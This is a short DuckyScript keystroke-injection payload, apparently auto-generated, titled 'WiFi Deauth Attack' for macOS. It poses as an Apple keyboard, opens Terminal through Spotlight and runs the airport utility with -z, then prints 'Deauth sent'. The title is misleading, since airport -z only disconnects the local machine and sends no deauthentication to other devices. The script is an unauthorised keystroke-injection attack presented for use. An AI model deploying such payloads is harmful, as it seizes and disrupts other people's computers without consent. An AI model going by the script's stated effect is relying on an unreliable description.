REM Author: Generated
REM Title: WiFi Deauth Attack
REM Target: macOS
REM Version: 1.0
REM Category: Network-Attacks
REM ---
DELAY 1000
REM Deauth all connected WiFi networks
REM NOTE: Requires airport utility (install airport from macOS pkg)
REM ID 05ac:021e Apple:Keyboard
DELAY 1000
GUI SPACE
DELAY 500
STRING terminal
DELAY 500
ENTER
DELAY 1000
STRING if /System/Library/PrivateFrameworks/Apple80211.framework/Versions/Current/Resources/airport -s | grep -q ''; then /System/Library/PrivateFrameworks/Apple80211.framework/Versions/Current/Resources/airport -z; fi
ENTER
DELAY 500
STRING echo 'Deauth sent'
ENTER
DELAY 500
GUI w
